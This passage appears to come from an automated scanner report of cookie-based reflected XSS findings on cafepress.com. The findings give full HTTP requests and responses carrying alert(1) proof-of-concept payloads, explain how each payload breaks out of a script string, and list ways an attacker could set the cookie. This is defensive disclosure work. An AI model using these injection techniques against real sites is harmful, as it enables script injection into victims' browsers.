Echoing user-controllable data within a script context is inherently dangerous and makes XSS hard to prevent reliably. Where possible, keep user data out of inline script altogether: emit it in an HTML attribute (for example a data-* attribute) with standard HTML entity encoding and have the page's JavaScript read it at runtime. If the value must appear inside a script, serialise it as a JSON string and additionally escape <, >, & and the line terminators U+2028 and U+2029 as \uXXXX sequences, so that neither a quote nor a </script> sequence in the input can change the surrounding syntax. Escaping quotes on its own is not sufficient, as this finding shows.
Request
GET /+clocks HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=56c87</script><script>alert(1)</script>eb1ed059733 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 59367 Date: Sun, 26 Dec 2010 13:48:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:55 GMT; path=/ Set-Cookie: cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:55 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59367 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '56c87</script><script>alert(1)</script>eb1ed059733 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.28. http://www.cafepress.com/+coasters [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+coasters
Issue detail
The value of the cp-v cookie is copied, unencoded, into a JavaScript string literal delimited by double quotation marks inside an inline script (the s.eVar30 assignment in the response below). The payload 9d05a"-alert(1)-"a640bcdbb5e was submitted in the cp-v cookie and echoed unmodified. The embedded double quote closes the literal, -alert(1)- is then evaluated as part of a subtraction expression, and the final quote reopens a string so the statement remains syntactically valid and the script does not abort. This proof of concept shows that arbitrary JavaScript can be injected into the application's response. Because the reflected data arrives in a cookie, the behaviour is not trivial to exploit against another user: an attacker first needs a way to set an arbitrary cookie in the victim's browser, for example through a response-header injection, through content on any host able to set cookies for the cafepress.com domain (the application's own Set-Cookie headers use domain=cafepress.com, so every subdomain is in scope), or through an on-path attacker, since the page is served over plain HTTP. That prerequisite considerably reduces the impact of the issue.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and makes XSS hard to prevent reliably. Where possible, keep user data out of inline script altogether: emit it in an HTML attribute (for example a data-* attribute) with standard HTML entity encoding and have the page's JavaScript read it at runtime. If the value must appear inside a script, serialise it as a JSON string and additionally escape <, >, & and the line terminators U+2028 and U+2029 as \uXXXX sequences, so that neither a quote nor a </script> sequence in the input can change the surrounding syntax. Escaping quotes on its own is not sufficient, as the cp_st findings in this report show.
Request
GET /+coasters HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA9d05a"-alert(1)-"a640bcdbb5e ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 59298 Date: Sun, 26 Dec 2010 13:48:59 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:59 GMT; path=/ Set-Cookie: cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:59 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59298 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA9d05a"-alert(1)-"a640bcdbb5e "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.29. http://www.cafepress.com/+coasters [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+coasters
Issue detail
The value of the cp_st cookie is copied, unencoded, into a JavaScript string literal delimited by single quotation marks inside an inline script (the window.cafepress.tealeaf.searchTerm assignment in the response below). The payload 47b5e</script><script>alert(1)</script>c56a41dcd4d was submitted in the cp_st cookie and echoed unmodified. Note that this payload never touches the quotes: the HTML parser ends the script element at the first </script regardless of the JavaScript quoting state, and the injected <script> block that follows is then executed. Escaping quotes alone would therefore not close this reflection; <, > and & must be encoded as well. This proof of concept shows that arbitrary JavaScript can be injected into the application's response. Because the reflected data arrives in a cookie, the behaviour is not trivial to exploit against another user: an attacker first needs a way to set an arbitrary cookie in the victim's browser, for example through a response-header injection, through content on any host able to set cookies for the cafepress.com domain (the application's own Set-Cookie headers use domain=cafepress.com, so every subdomain is in scope), or through an on-path attacker, since the page is served over plain HTTP. That prerequisite considerably reduces the impact of the issue.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+coasters HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=47b5e</script><script>alert(1)</script>c56a41dcd4d ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 59305 Date: Sun, 26 Dec 2010 13:48:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59305 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '47b5e</script><script>alert(1)</script>c56a41dcd4d ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.30. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536 [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+eat_sleep_game_light_tshirt,299007536
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbfc3"-alert(1)-"de6154bb2da was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+eat_sleep_game_light_tshirt,299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAbbfc3"-alert(1)-"de6154bb2da ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 93266 Date: Sun, 26 Dec 2010 13:49:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=801deb16c59ee3f96b4c4bec; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:57 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:57 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93266 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAbbfc3"-alert(1)-"de6154bb2da "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.31. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536 [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+eat_sleep_game_light_tshirt,299007536
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58edd</script><script>alert(1)</script>b17bfa61193 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+eat_sleep_game_light_tshirt,299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=58edd</script><script>alert(1)</script>b17bfa61193 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 93292 Date: Sun, 26 Dec 2010 13:49:54 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=801deb16c59ee3f96b4c4bec; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:54 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:54 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93292 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'ProductDetails' window.cafepress.tealeaf.searchTerm = '58edd</script><script>alert(1)</script>b17bfa61193 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.32. http://www.cafepress.com/+framed-prints [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+framed-prints
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4dfd"-alert(1)-"012c3a7120a was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
